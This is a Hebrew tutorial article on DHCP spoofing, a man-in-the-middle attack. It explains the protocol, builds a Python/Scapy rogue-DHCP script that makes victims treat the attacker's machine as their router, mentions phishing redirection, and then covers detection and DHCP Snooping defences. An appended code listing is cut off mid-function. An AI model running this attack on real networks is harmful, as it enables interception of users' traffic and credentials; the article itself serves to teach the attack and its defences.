- DHCP Spoofing Attack דן בוגנים (SnipSkill( הקדמה אני מניח שרובכם מכירים או לפחות שמעתם על הפרוטוקול,DHCP פרוטוקול המהווה בסיס מרכזי בכמעט כל רשת, מר

גודל: px
התחל להופיע מהדף:

Download "- DHCP Spoofing Attack דן בוגנים (SnipSkill( הקדמה אני מניח שרובכם מכירים או לפחות שמעתם על הפרוטוקול,DHCP פרוטוקול המהווה בסיס מרכזי בכמעט כל רשת, מר"

תמליל

1 - DHCP Spoofing Attack דן בוגנים (SnipSkill( הקדמה אני מניח שרובכם מכירים או לפחות שמעתם על הפרוטוקול,DHCP פרוטוקול המהווה בסיס מרכזי בכמעט כל רשת, מרשתות בייתיות ועד רשתות ענק של ארגונים ותעשיות גדולות. במאמר זה אציג מתקפת רשת המבוססת על הפרוטוקול - כיצד תוקף אשר נמצא ברשת יכול לנצל את העובדה ששאר המחשבים ברשת מצפים לקבל את פרטי החיבור שלהם לרשת דרך שרת מרכזי מבלי לבדוק יותר מדי את זהותו. מעבר ללמידה התיאורית, נכתוב יחד סקריפט פייתון )עם שימוש ב- Scapy ( אשר יממש את המתקפה. לפני שנתחיל, אני ממליץ מאוד לקרוא לעומק על הפרוטוקול ועל אופן הפעולה שלו )באחד מהקישורים למטה( אם כי במאמר זה נסקור זאת בקצרה. )לרציניים ביותר, RFC 2131 הוא ה- RFC שמסביר איך עובד הפרוטוקול(. כמו כן, מומלץ )אך לא חובה, שכן אסביר את הקוד ביתר פירוט( לדעת לתכנת בשפת Python ולהכיר את אופן השימוש בספרייה,Scapy סיפרייה המאפשרת לשלוח ולהסניף פקטות היוצאות ומתקבלות מכרטיסי הרשת של המחשב. קישורים ללימוד Python ו- Scapy באופן עצמאי יצורפו בדף הקישורים שבסוף המאמר. על הפרוטוקול DHCP הוא פרוטוקול המספק ללקוח המעוניין Dynamic Host Configuration Protocol או DHCP פרוטוקול להתחבר לרשת מקומית, פרטים על הרשת, לדוגמה: Subnet Mask - טווח הרשת המקומית כתובת ה- IP של הנתב שרתי ה- DNS של כתובת ה- IP כמו כן שרת ה- DHCP שמספק את הפרטים האלו, מספק גם את כתובת ה- IP המקומית שתהיה למחשב שרוצה להתחבר לרשת, על מנת שיוכל לתקשר עם הנתב, ישנם עוד פרטים ששרת ה- DHCP מספק ללקוח אך הם פחות חשובים למאמר זה.

2 הפרוטוקול נבנה על מנת לאפשר ללקוחות חדשים להצטרף אל הרשת ולהשתמש בה וגם בכדי להקל את עבודתם של מנהלי הרשת בהקצאת כתובות IP באופן ידני לכל אחד ואחד מהלקוחות. תהליך ה D.O.R.A- התהליך שנקרא D.O.R.A הוא התהליך המתבצע כאשר לקוח מבקש להתחבר לרשת, התהליך כולל ארבעה שלבים :.1 הודעת DHCP Discover היא ההודעה הראשונה שנשלחת על ידי הלקוח ברחבי הרשת (כלומר על לכל המשתמשים לאופן השליחה הזה קוראים )Broadcast וזאת על מנת ששרת ה DHCP- ידע שהלקוח רוצה להתחבר לרשת..2 הודעת DHCP Offer היא ההודעה איתה עונה שרת ה DHCP- על הודעת ה Discover- והיא מכילה את כתובת IP אותה השרת מציע ללקוח..3 הודעת DHCP Request היא ההודעה השלישית בתקשורת אותה שולח הלקוח כתגובה להודעת ה - Offer והיא נשלחת על מנת לומר לשרת ה DHCP- שהלקוח מקבל את ההצעה ומוכן לקבל פרטים נוספים על הרשת..4 הודעת DHCP Acknowledge היא ההודעה האחרונה כחלק מתהליך ה D.O.R.A- אותה שולח השרת ללקוח בה נשלחים פרטים נוספים על הרשת. על מנת לחזות בתהליך, פתחו Wireshark להסנפת הפקטות ברשת המקומית שלכם והכניסו את הפילטר dhcp על מנת לראות אך ורק את פקטות ה.DHCP- שימו לב : שכל ההודעת גם מצד הלקוח וגם מצד השרת נשלחות ב,Broadcast- בתמונה 1 אנו אכן רואים כי ההודעות שנשלחו מהנתב נשלחות ישירות אל המחשב שלנו אך זה קורה מאחר והנתב זוכר את המחשב שלנו. 2

3 מתקפות MITM מתקפת MITM או Man In The Middle הן סוג של מתקפות רשת בה גורם שלישי מצליח להכניס את עצמו בתווך שבין שני מחשבים המדברים אחד עם השני בלא ידיעתם. במספר מתקפות התוקף מצליח להתחזות לכל אחד מהמחשבים בנפרד ולגרום להם להאמין כי הם באמת מדברים אחד עם השני. אך בפועל, כל מחשב שולח את המידע אל התוקף והתוקף מעביר את המידע אל המחשב השני. כמו שכבר בטח ניחשתם, מתקפת ה DHCP Spoof- עליה נתמקד במאמר זה הינה גם מתקפת.MITM אך כמוה ישנן עוד הרבה מתקפות מגוונות ומעניינות מהסוג הזה עליהן אני ממליץ בחום לקרוא, חלקן קלות באופן מפחיד למימוש למשל : מתקפת ( Arp Spoofing מצורף מאמר שכתב רזיאל בקר בדף הקישורים) מתקפת ICMP Redirect מתקפת ( NBNS Spoofing מצורף מאמר שכתב אפיק קסטיאל בדף הקישורים) הסבר קצר על איך עובדת מתקפת DHCP Spoof מתקפת ה DHCP Spoof- כמו הרבה מתקפות MITM אחרות מתרכזת בעובדה שתהליך ה D.O.R.A- נעשה כולו ב Broadcast- ושהלקוח סומך על שרת ה DHCP- האמיתי שיתקשר איתו. המתקפה מתחילה כאשר הלקוח רוצה להתחבר לרשת ולשם כך שולח פקטת,DHCP Discover לאחר שליחת הפקטה, התוקף עונה ללקוח בהודעת.DHCP Offer הלקוח, שרואה את ההודעה ששלח התוקף, חושב כי שרת ה DHCP- שלח אותה ועונה לה כרגיל עם הודעת DHCP Request ולאחר מכן התוקף עונה לו בהודעת DHCP Acknowledge אך הודעה זו, בשונה משאר ההודעת, תהיה שונה ותהווה את הבסיס למתקפה! בהודעת ה DHCP Acknowledge - ששלח התוקף ללקוח, כתובת ה IP- של הנתב תהיה בעצם כתובת ה IP- של מחשבו של התוקף, כך שכל פעם שהלקוח ירצה לגלוש ברשת, למשל, להתחבר לפייסבוק, פרטי 3

4 ההתחברות שלו יגיעו לשרתי פייסבוק דרך מחשבו של התוקף, ולא דרך הנתב המקומי, וזו הסכנה הגדולה במתקפת ה DHCP Spoof- ובכלל במתקפות.MITM הסבר קצר על Scapy כפי שהסברתי מוקדם יותר, את הקוד נממש בעזרת הספרייה Scapy שמאפשרת להסניף ולשלוח פקטות, ספרייה זו שימושית בשבילנו שכן נרצה לדעת מתי לקוח חדש רוצה להתחבר לרשת, וכמו כן, נרצה לשלוח לו את הפקטות המתאימות ( )DHCP Offer, DHCP Acknowledge על מנת לבצע את המתקפה. מי שמכיר את הספרייה מוזמן לדלג על החלק הבא ולהגיע ישר לחלק בו נכתוב את המתקפה. כעת אציג את הפונקציות השונות שמאפשרות לנו להסניף ולשלוח פקטות ואדבר על כל אחת בקצרה : ) sniff(count, lfilter, prn, timeout הפונקציה sniff מאפשרת לנו להסניף פקטות שנכנסות ויוצאות מהמחשב שלנו, הפונקציה מקבלת מספר פרמטרים אופציונלים : Count הפרמטר הזה מקבל מספר חיובי והוא מעיד על כמות הפקטות שאנו נרצה להסניף עד שהפונקציה תפסיק, למשל : ) sniff(count = 2 במקרה זה, הפונקציה תסניף 2 פקטות ואז תעצור. כמו כן, הפונקציה מחזירה מערך ( )array של הפקטות אותה היא הסניפה ולכן אם תרצו לנתח את הפקטות שהסנפתם בהמשך, תוכלו להקצות את הפונקציה למשתנה באופן הבא : ( lfilter האות L קטנה) הפרמטר הזה מקבל פונקציה, הפונקציה מקבלת כפרמטר פקטה שהוסנפה, והפונקציה בודקת את הפקטה ומחזירה True או False בהתאם, אם הפונקציה תחזיר True הפקטה תישמר, אחרת הפקטה תיזרק. דוגמה : 4

5 Prn הפרמטר הזה מקבל פונקציה, הפונקציה מקבלת פקטה שהוסנפה ועברה את הפונקציה שניתנה בפרמטר ( lfilter במידה וניתנה פונקציה לפרמטר הזה) : timeout הפרמטר הזה מקבל מספר (בשניות) המייצג את כמות הזמן שעל הפונקציה לעבוד עד אשר היא צריכה להפסיק. 5

6 ) send(x ו sendp(x)- הפונקציה () send מאפשרת לנו לשלוח פקטות, הפרמטר,x הראשון שהפונקציה תקבל, יהיה הפקטה אותה נרצה לשלוח. ההבדל בין הפונקציות () send ו sendp)(- הוא שהראשונה שולחת את הפקטות בשכבה השלישית, כלומר בשכבת ה IP- ללא שכבת ה Ethernet- והשנייה שולחת פקטות בשכבה השנייה, כלומר עם שכבת ה,Ethernet- להלן דוגמה לשימוש בשתי הפונקציות : דוגמא לשימוש בפונקציה )( :send דוגמא לשימוש בפונקציה )( :sendp דבר חשוב מאוד שיש לציין, שבלעדיו הקוד שלנו לא היה מצליח להיות מהיר יותר משרת ה,DHCP- הפונקציות שהצגתי כרגע אכן שולחות פקטות, אך הן עושות את זה מאוד לאט (באופן יחסי לשרת ה -,)DHCP הסיבה לאיטיות הזו נעוצה בעובדה שבכל פעם שהפונקציות האלו שולחות פקטה, הן יוצרות משהו שנקרא socket זה הדבר שבאמצעותו הן שולחות את הפקטה, ויצירת socket כל פעם מחדש בעת שליחת הפקטה לוקח המון זמן! למזלנו, הפונקציות () send ו sendp)(- מקבלות פרמטר בשם,socket ובהינתן הפרמטר הזה, הפונקציה לא תיצור socket חדש, אלא תשתמש ב socket- שהבאנו לו ובכך תחסוך זמן יקר! 6

7 שימו לב לשורה 18 בתמונה הקודמת, שם יצרנו socket בעזרת האובייקט conf ש scapy- מספק לנו, ולאחר מכן, העברנו את ה socket- שיצרנו לפונקציה () sendp על ידי הפרמטר.socket ) srp(x),sr1(x),sr(x ו srp1(x)- הפונקציות הנ"ל מקבלות פקטה בתור הפרמטר הראשון,x שולחות אותה, ומחזירות את התשובה לפקטה מהמחשב אליו היא נשלחה, כל פונקציה שונה במעט ולכן נעבור על השוני בקצרה : sr שולחת פקטה בשכבה השלישית ומקבלת tuple מהצורה הבאה : ) (packet_sent & answers, unanswered_packets sr1 שולחת פקטה בשכבה השלישית ומקבלת את הפקטה שנשלחה כתשובה. srp שולחת פקטה בשכבה השנייה ומקבלת tuple מהצורה הבאה : ) (packet_sent & answers, unanswered_packets srp1 שולחת פקטה בשכבה השנייה ומקבלת את הפקטה שנשלחה כתשובה. בדוגמה הבאה אני שולח פקטת DNS שתחזיר לי את כתובת ה IP- של,google אם תנסו לעשות זאת בעצמכם, תחזור אליכם פקטת DNS עם כתובת ה IP- של :google זו הייתה דוגמה לאופן פעולתה של הפונקציה,srp1 ובאופן דומה אפשר להשתמש בשאר הפונקציות, עם זאת, יש לשים לב שאם תנסו לעשות () packet.show כאשר המשתנה packet הוא tuple תיתקלו בשגיאה, במקרה הזה יש להדפיס את המשתנה בעזרת הפונקציה ().print 7

8 מימוש המתקפה ב Python- כעת, לאחר שלמדנו על הפרוטוקול DHCP - ועל ניצול אופן הפעולה שלו למתקפת DHCP Spoof - וקצת על הספרייה Scapy - נוכל ליצור קוד שמדמה את המתקפה בעצמנו! את הקוד נכתוב בשפה,3.7 Python - אם אתם לא מכירים את השפה או ששמעתם עליה אך אין לכם מושג איך להשתמש בה, מומלץ ללמוד להשתמש בשפה אם ברצונכם להבין את הקוד לפני שנתחיל. לעומת זאת, למי שמכיר את השפה ויצא לו להשתמש בה כבר, אני ממליץ לכם לנסות לממש את הקוד בעצמכם! ואפילו לשלוח למייל שלי שאותו אצרף בסוף המאמר את הקוד, בהצלחה לאמיצים! את הקוד אכתוב בעורך,Visual Studio Code בדף הקישורים אצרף לינק להורדת העורך, כמו כן אצרף לינקים להורדת Python 3.7 ולהורדת.Scapy אם יש לכם כבר Python - והורדתם כלי בשם,pip תוכלו להיכנס ל cmd- ולכתוב את השורה הבאה על מנת להוריד את Scapy באופן מהיר יותר : pip install scapy אתם מוזמנים להוריד את הקוד המצורף בסוף המאמר ולעקוב אחר ההסבר, את הקוד נכתוב שלב אחר שלב עד להשלמתו. שלב א' imports : והגדרת משתנים עכשיו, כשאנחנו סוף סוף מוכנים לכתוב את הקוד, נתחיל מהגדרת כל המשתנים והפונקציות שיעזרו לנו לממש את הקוד : 8

9 בשורה מספר 1 אנו מייביאים )import( את כל הפונקציות של הספרייה Scapy יותר, על מנת להסניף ולשלוח פקטות ברשת המקומית. בשורות 20-3 אנו מגדירים את כל המשתנים הגלובלים שיעזרו לנו בהמשך עליה דיברנו מוקדם בשורות 9-3 אנו מגדירים משתנים הקשורים לפרוטוקול,DHCP כמו המספר שקובע מה סוג חבילת ה- DHCP והפורטים שבהם הפרוטוקול DHCP מתקשר. בשורות אנו מגדירים את כל הגדרות הרשת כמו כתובת ה- IP שלנו ושל הנתב האמיתי, כתובת ה- MAC של כרטיס הרשת שלנו ושל כרטיס הרשת של הנתב האמיתי, הגדרות אלו יחליפו את ההגדרות ששרת ה- DHCP נותן בדרך כלל ללקוחות ובכך יגרמו לקורבנות לחשוב שהמחשב שלנו הוא הנתב האמיתי. שימו לב! כאשר אנו מחליפים רשת מקומית, עלינו מריצים אותו על מנת שהוא יעבוד. גם לשנות את הגדרות הרשת בקוד לפני שאנו על מנת לגלות את רוב הגדרות הרשת באופן מהיר, כנסו ל- CMD והכניסו את הפקודה ipconfig /all על מנת לקבל הגדרות רשת מתקדמות כמו כתובת הנתב, הכתובת של המחשב שלכם, כתובת שרת ה- DNS וכו'... בשורה - 22 אנו יוצרים socket של.scapy על מנת ששליחת הפקטות תתבצע באופן מהיר, כפי שלמדנו בחלק בשורות אנו יוצרים 2 מערכים שישמשו אותנו בשמירת הכתובות החופשיות אותן ניתן לקורבנות שלנו ובשמירת הכתובות שנתנו לקורבנות שלנו. 9 DHCP Spoofing Attack גליון 115, פברואר 2020

10 שלב ב': בניית הפונקציה main הפונקציה main תהיה הפונקציה הראשית שלנו ממנה הקוד יתחיל, תפקידה יהיה להסניף פקטות שנשלחות ברשת ולהעבירן ל עיבוד נוסף, הקוד לפונקציה הראשית יראה כך: הפונקציה main מסניפה פקטות על ידי שימוש בפונקציה sniff ומעבירה אותן לעיבוד נוסף על ידי הפונקציות filter_dhcp_packets ו- build_dhcp_response_packets, הפונקציה המתקבלת ב- lfilter תסנן את הפקטות הרלוונטיות בשבילנו שהן DHCP DISCOVER או.DHCP_REQUEST פקטה שעברה את הסינון בהצלחה תעבור כפרמטר לפונקציה שצוינה בפרמטר,prn במקרה שלנו, הפונקציה,build_dhcp_response_packets כעת נעבור על כל אחת מהפונקציות בנפרד ונראה איך הן נראות. אך לפני שהופנקציה עושה את כל זה, עלינו למצוא כתובות IP חופשיות שניתן לקורבנות שלנו, לכן נשתמש בפונקציה find_vacant_ip_address שמוצאת כתובות חופשיות )הפונקציה תמצא ip_count כתובות חופשיות(, ושמה אותן במשתנה vacant_ips שהגדרנו בהתחלה. את הפונקציה אצרף בסוף המאמר ביחד עם שאר הקוד ולא אסביר על אופן פעולתה במאמר זה. שלב ד': סינון הפקטות הפונקציה filter_dhcp_packets מקבלת כפרמטר את הפקטה שהוסנפה, ומצופה להחזיר ערך בוליאני build_dhcp_response_packets אז הפקטה תעבור לפונקציה True אם חזר הערך,)False או True( לעיבוד נוסף, אחרת הפקטה תיזרק והפונקציה sniff תעבור לפקטה הבאה שהיא קלטה ותמשיך את התהליך הנ"ל עד אשר התוכנה תסתיים. 01 DHCP Spoofing Attack גליון 115, פברואר 2020

11 התנאי הראשון בשורה 89 שהפונקציה בודקת נועד על מנת לעצור את המתקפה שלנו כאשר לא נשארו לנו עוד כתובות חופשיות להקצות לקורבן : הפונקציה בודקת שני מקרים, ואם אחד מהם יהיה True אז הפונקציה תעביר את הפקטה לעיבוד נוסף על ידי.build_dhcp_response_packets is_dhcp_packet התנאי הזה בודק אם הפקטה היא בכלל פקטת DHCP שעליה נרצה לענות לקורבן, על מנת לעשות זאת, נבדוק כמה דברים : - DHCP in packet.1 תנאי זה נועד לבדוק האם הפקטה היא פקטת,DHCP אם הפקטה היא לא פקטת DHCP אז אנו אפילו לא מעוניינים להמשיך לבחון אותה, אלא אם כן היא פקטה שהקורבן שולח לנו (בשלב שהוא כבר בידינו)..2 אם הפקטה היא אכן פקטת DHCP נבדוק את התנאי שבשורה 93 על פי האיור למעלה. התנאי נועד לבדוק האם פקטת ה - DHCP- שתפסנו הינה פקטה מסוג Discover או פקטה מסוג,Request אנו לא מעוניינים בכל שאר פקטות ה DHCP- שקיימות כמו ACKNOWLEDGE,OFFER,NAK וכדומה. אם הפקטה עונה על שני התנאים האלו, הפוקנציה filter_dhcp_packets תחזיר את True והפקטה תעבור כפרמטר לפונקציה הבאה שלנו build_dhcp_response_packets - victim_packet אם הפקטה היא לא פקטת DHCP אז יכול להיות שהיא פקטה שנשלחה על ידי הקורבן שלנו לאחר שכבר ביצענו עליו את מתקפת ה,DHCP Spoof- תנאי זה בודק עם כתובת ה IP- של הפקטה היא כתובת IP של אחד מהקורבנות שלנו (השמורים במשתנה,)victim_ips ואם כך, הפקטה תעבור לעיבוד נוסף. 00

12 שלב ה' : בניית פקטות התשובה ) (DHCP Offer, DHCP Acknowldege הפונקציה build_dhcp_response_packets מעבדת את הפקטה שקיבלה ובונה בהתאם אליה את פקטת התשובה אותה נרצה לשלוח לפני ששרת ה DHCP- מספיק לשלוח את פקטת התשובה שלו ובכך "לגנוב" את הלקוח ולתת לו הגדרות רשת מזויפות : בתחילת הפונקציה אנו מגדירים משתנה בשם packet_to_send אותו נשנה לאורך הפונקציה ולבסוף נשלח את הפקטה לאן שנצטרך. תחילה נבדוק אם הפקטה היא פקטה שהתקבלה מהקורבן שלנו על ידי התנאי בשורה,108 אם כן, נוכל להעביר את הפקטה לנתב ולהחזיר לקורבן את מה שרצה או שנוכל להחזיר לו משהו אחר, כמו אתר Phishing או כל דבר אחר שנעלה על רוחנו. אם הפקטה היא פקטת,DHCP אז אנו נצטרך לבנות פקטות מתאימות ולשלוח ב Broadcast- מהר מהר ולפני ששרת ה DHCP- עושה זאת, תחילה נבדוק אם הפקטה ששלח הקורבן היא פקטת DHCP_DISCOVER ואם כן נבנה פקטת DHCP_OFFER אחרת, נבנה פקטת DHCP_ACKNOWELDEGE יש לזכור שהמשתנים DHCP_DISCOVER_TYPE ו DHCP_REQUEST_TYPE- הם משתנים גלובלים שהוגדרו בתחילת התוכנה המעידים על סוג הפקטה. לכל פקטת DHCP שונה, יש מספר המייצג את הסוג שלה, לרשימת הסוגים ומספרם השונים של פקטות ה :DHCP- 02

13 בניית פקטת ה DHCP Offer- את בניית פקטת ה DHCP Offer- נעשה בשלבים הבאים לפי הסדר הבא : - Ethernet שכבת הקו - IP שכבת הרשת - UDP שכבת התעבורה - DHCP שכבת האפליקציה ולאחר הבנייה של כל שכבה בנפרד, נחבר את כל השכבות ביחד ונקצה למשתנה בשם packet_to_send לשכבת ה Ethernet- נקצה את כתובת המקור ( )src להיות כתובת המקור של כרטיס הרשת שלנו, ואת כתובת הקצה ( )dst להיות.Broadcast לשכבת ה IP- נעשה את אותו הדבר רק עם כתובות IP ה src- יהיה כתובת ה IP- של המחשב שלנו וה dst- יהיה כתובת ה.Broadcast- פרוטוקול ה DHCP- פועל על הפורטים 67 ו 68- כאשר פורט 68 הוא הפורט של הלקוח ופורט 67 הוא הפורט של שרת ה,DHCP- ולכן נשנה בשכבת ה UDP- את פורט המקור ( )sport ואת פורט היעד ( )dport לערכים הנ"ל. כעת הגענו לשכבת האפליקציה, ונרצה לבנות את החלק של הפרוטוקול,DHCP ואנו נבנה את החלק הזה בעזרת הפרוטוקול.BOOTP הפרוטוקול BOOTP הוא פרוטוקול שהיה קיים לפני,DHCP ועשה פעולות דומות למה שעושה,DHCP אך לאחר זמן מה, הוחלט לבנות פרוטוקול אחר, טוב יותר שיספק נתוני רשת ללקוחות ויעשה זאת בצורה טובה יותר מהפרוטוקול,BOOTP אך מאחר ואופן הפעולה של שני הפרוטוקולים הוא דומה בסך הכל, הוחלט לשלב את הפרוטוקול DHCP עם BOOTP ולבנות את האחד על השני. על איחוד הפרוטוקולים תוכלו לקרוא בלינק הבא בחלק של ההיסטוריה : 03

14 בכל מקרה, רוב הפרמטרים שבפרוטוקול BOOTP לא כאלו מעניינים, החלקים החשובים הם הפרמטרים xid ו,yiaddr- הפרמטר הראשון הוא תעודת הזהות המיוחדת שיש לתהליך ה DHCP- של הפקטה ששלח הקורבן, אם אנו נבנה את פקטת התשובה שלנו עם xid שונה מהאחד שהיה לפקטה ששלח הקורבן, הוא לא יקבל אותה. הפרמטר השני הוא כתובת ה IP- שאנו מציעים לקורבן לקבל, הפרמטר יקבל את הערך victim_ip_offer שאותו הגדרנו למעלה, בשורה,111 שהוא יהיה אחד מהכתובות החופשיות שמצאנו בתחילת המתקפה. הגענו לבניית ה,DHCP- שוב, על הרבה מהפרמטרים לא ארחיב, אך שניים מהפרמטרים router : ו - server_id הם החלק החשוב של המתקפה, לפרמטרים הללו נקצה את הערך,MY_COMPUTER_IP דבר זה יגיד לקורבן שכתובת הנתב היא הכתובת של המחשב שלנו. יש לשים לב שאת הפרמטר subnet_mask הקצתי באופן סטטי להיות " " שכן רוב הרשתות משתמשות בערך הזה, אך יש לשים לב לדבר כאשר אנו מנסים לבצע את המתקפה, מאחר ויכול להיות שערך זה לא יהיה נכון ותצטרכו לשנותו. ובסוף הבנייה של כל השכבות בנפרד, נחבר את כולן ביחד ונקצה למשתנה.packet_to_send בניית פקטת ה :DHCP Acknowledge- תהליך בניית פקטת ה DHCP ACKNOWLEDGE- הוא מאוד דומה לתהליך של בניית פקטת ה DHCP -,OFFER הדבר היחידי ששונה הוא סוג הפקטה תחת הפרמטר.message-type לאחר בניית הפקטה בשורות אנו מסירים את הכתובת שנתנו לקורבן מהמערך vacant_ips ואנו מוסיפים אותה למערך.victim_ips 04

15 וזהו זה. סיימנו לכתוב את הקוד של המתקפה, לפני שאתם מנסים בעצמכם את הקוד, שימו לב שהורדתם את כל הספריות, כמו כן שימו לב שכל המשתנים הגלובליים שהגדרנו בהתחלה מוגדרים אצלכם לערכים הנכונים לרשת המקומית שלכם. 05 DHCP Spoofing Attack גליון 115, פברואר 2020

16 זיהוי המתקפה כעת, לאחר שהבנתם איך המתקפה עובדת, וכתבם את המתקפה בעצמכם, אתם בטח שואלים את עצמכם, מה אם מישהו תוקף אותי ממש עכשיו עם המתקפה הזו... אז אל דאגה, רוב הסיכויים שאף אחד לא תוקף אתכם, אך בכל זאת, למה שלא תדעו אנו יודעים שהמתקפה הזו מתבצעת ברגע ההתחברות לרשת, לכן, נפתח את ( Wireshark או כל תוכנת הסנפה אחרת שתרצו לעבוד איתה) ונתחיל להסניף על כרטיס הרשת שאיתו נתחבר לרשת, בשבילי זה יהיה כרטיס ה :Wifi- כעת בהנחה ואתם מחוברים לאינטרנט, תתנתקו ממנו. על מנת שנוכל לנתח את תהליך ההתחברות נרצה להסניף את הפרוטוקול,dhcp ולשם כך, נכתוב " "dhcp בשורת המסננים של :Wireshark תוך כדי שההסנפה פועלת, התחברו לאינטרנט ושימו לב לפקטות שאתם רואים ב,Wireshark- בהנחה והכל עובד, ואף אחד לא תוקף אתכם אתם אמורים לראות 4 פקטות (או שתיים אם הנתב לא שכח אתכם) ממש כפי שלמדנו בתחילת המאמר, לפי תהליך ה D.O.R.A- 06

17 אבל, אם מישהו אכן תוקף אתכם, אתם תיראו 6 פקטות, מאחר וישנן 2 פקטות שנשלחות מהנתב אליכם, התוקף ישלח גם כן את אותן 2 פקטות, לכן נראה הוספה של 2 פקטות בתהליך (אם הנתב זוכר אתכם, אתם תיראו 3 פקטות, מאחר והתוקף ישלח פקטת ACK נוספת) : אוקיי, מצוין, עכשיו אתם יודעים איך לדעת אם מישהו תוקף אתכם במתקפת,DHCP Spoof אבל מה אם אתם כבר מחוברים לרשת ואתם רוצים לדעת אם אתם כבר תחת התקפה. במקרה הזה, אין הרבה שתוכלו לעשות כדי לגלות אם אתם תחת מתקפה או לא, אבל מאחר ועכשיו כל הפקטות צריכות לעבור דרך גורם נוסף (שהוא התוקף כמובן) אנו נוכל להניח שיקח להן זמן רב יותר לחזור אלינו, ולכן, אם האינטרנט שלכם איטי במידה מחשידה בלי שום סיבה, יכול להיות שאתם תחת התקפה 07

18 דרכי התגוננות אמנם אין לנו דרך לדעת אם מישהו תוקף אותנו ברגע זה )אם אתם חושדים הדבר הטוב ביותר שאתם יכולים לעשות הוא פשוט להתנתק מהרשת(, אבל כן נוכל להתגונן מהתקפות עתידיות שעלולות לבוא על הרשת שלנו. השיטה הנפוצה ביותר כיום להגנה מפני מתקפת DHCP Spoof היא שיטה שנקראת,DHCP Snooping למען האמת, אני אישית לא נתקלתי באף רשת שהשתמשה בהגנה הזו, אבל אני יכול לשער שברוב החברות הגדולות שלוקחות ברצינות מתקפות נגדן דרך ההגנה הזו נמצאת בשימוש. ההגנה הזו )שכעת, על מנת לקצר תהליכים תקרא בשם )Dsnop היא בעצם פיסת תוכנה, המותקנת על הנתב שמנהל את הרשת המקומית, המנטרת תעבורת DHCP ומשמיטה פקטות כוזבות.)Invalid) אילו פקטות Dsnop משמיט? 1. פקטות DHCP הנשלחות משרת DHCP לא אמין יושמטו. 2. פקטות DHCP אשר כתובת ה- MAC בהן אינה תואמת את כתובת ה- MAC האמיתית של כרטיס הרשת ממנו הן נשלחות. 3. פקטות DHCP אשר משחררות חיבור RELEASE( )DHCP או פקטת DHCP אשר דוחה הצעה משרת ה- DHCP בשם,DHCP DECLINE שלא נשלחות מהמחשב שרוצה לשחרר את החיבור או לדחות הצעה, יושמטו. עוד על Dsnop ועל איך בדיוק הוא מגלה ומשמיט את הפקטות הנ"ל תוכלו לקרוא בלינק המצורף בסוף המאמר. 08 DHCP Spoofing Attack גליון 115, פברואר 2020

19 סיכום זהו זה, סיימתם את המאמר, התחלנו בהסבר על הפרוטוקול DHCP והבנו איך ניתן לנצל את אופן העבודה שלו על מנת לבצע מתקפת,MITM מימשנו את המתקפה ב- Python בעזרת הספרייה,Scapy וסיימנו בללמוד על הדרכים לזיהוי והגנה מפני המתקפה. אני מקווה מאוד שלמדתם דברים חדשים ומעניינים ואני ממליץ לחובבי התקפות הסייבר שבינכם להמשיך וללמוד על מתקפות שונות ומגוונות )ולא פחות חשוב, איך להגן מפניהן(. קצת על עצמי: קוראים לי דן בוגנים, אני בן 18 תלמיד כיתה י"ב, לומד בירושלים, חובב מתקפות סייבר ואבטחת מידע, התחלתי ללמוד על הנושא מהחוברת המצוינת של גבהים בנושא רשתות תקשורת, מי שעדיין משתפשף עם כל הנושא של רשתות תקשורת ופרוטוקלים ולא בטוח איך הדברים עובדים אני אישית ממליץ מאוד לקרוא את החוברת הזו, לכל שאלה בנושא המאמר או בנושאים כללים הקשורים לסייבר אשמח לענות בכתובת האימייל: 09 DHCP Spoofing Attack גליון 115, פברואר 2020

20 דף קישורים :DHCP מאמר נרחב על אופן הפעולה של RFC Dynamic Host Configuration Protocol :Python קישור ללימוד 1mC_ :Scapy קישור ללימוד :Wireshark קישור להורדת :Visual Studio Code קישור להורדת :NBNS Spoofing :DHCP Snooping dhcp_snooping_rapier1.pdf :ARP Poisoning 21 DHCP Spoofing Attack גליון 115, פברואר 2020

21 from scapy.all import * # pip install scapy from func_timeout import func_timeout, FunctionTimedOut # pip install func_timeout import socket # pip install socket DHCP_DISCOVER_TYPE = 1 DHCP_REQUEST_TYPE = 3 DHCP_OFFER_TYPE = 2 DHCP_ACKNOWLEDGE_TYPE = 5 BOOTPC = 68 # Client side DHCP port BOOTPS = 67 # DHCP server side port BOOTP_REPLY_OP_CODE = 2 BROADCAST_MAC = "ff:ff:ff:ff:ff:ff" BROADCAST_IP = " " נספח א' - הקוד המלא MY_COMPUTER_MAC = "aa:bb:cc:dd:ee:ff" # Your computer MAC Address in the following format??:??:??:??:??:?? where? is a hexadecimal number MY_COMPUTER_IP = " " # Your computer LOCAL IP for example REAL_ROUTER_MAC = "ff:ee:dd:cc:bb:aa" # Router's MAC Address in the following format??:??:??:??:??:?? where? is a hexadecimal number REAL_ROUTER_IP = " " # Real Router IP DNS_SERVER_IP = " " # DNS Server IP SUBNET_MASK = " " # Your subnet mask in the following format - if your ip address is and the subnet is so SUBNET_MASK will be socket_send = conf.l2socket() vacant_ips = [] victim_ips = [] # Finds vacant IP Addresses and returns a vacant IP Addresses array # Deafult ip_count ( how many victims ) will be 1 def find_vacant_ip_address(ip_count = 1): time_to_wait = 1 # in seconds count = 2 ping_packet = IP(src = MY_COMPUTER_IP) / ICMP(type = "echo-request") / Raw('abcdefghigklmnopqrstuvwabcdefghi') # ICMP Echo Request while len(vacant_ips) < ip_count: print(len(vacant_ips)) ping_packet[ip].dst = SUBNET_MASK + str(count) if (ping_packet[ip].dst == MY_COMPUTER_IP): count += 1 ping_packet[ip].dst = SUBNET_MASK + str(count) try: func_timeout(time_to_wait, sr1, ping_packet) except FunctionTimedOut: vacant_ips.append(ping_packet[ip].dst) count += 1 print(vacant_ips) print("victim Count = {0} Victim IP = {1}".format(len(vacant_ips), vacant_ips[len(vacant_ips) - 1])) # Filters the dhcp packets def filter_dhcp_packets(packet): if ((len(vacant_ips) <= 0)): return False is_dhcp_packet = ( DHCP in packet ) and ( packet[dhcp].options[0][1] in (DHCP_DISCOVER_TYPE, DHCP_REQUEST_TYPE)) victim_packet = ( IP in packet ) and ( packet[ip].src in victim_ips) return is_dhcp_packet or victim_packet 20 DHCP Spoofing Attack גליון 115, פברואר 2020

22 # Build dhcp response packets # IMPORTENT! # Scapy calculates the len, and chcksm field and replaces them for us in the packet!!!!! # sr(), sr1() -> send and recive packets in the 3 layer # srp(), srp1() -> send and recive packets in the 2 layer # functions with 1 means that they will wait until getting only 1 answer and then stop def build_dhcp_response_packets(packet): print("building packet!") packet_to_send = None if (DHCP not in packet): ######################## # # Here you can change the response_packet value # To whatever value you would like to send to # your victim ######################## response_packet = None sendp(response_packet, socket = socket_send) else: victim_ip_offer = vacant_ips[len(vacant_ips) - 1] # 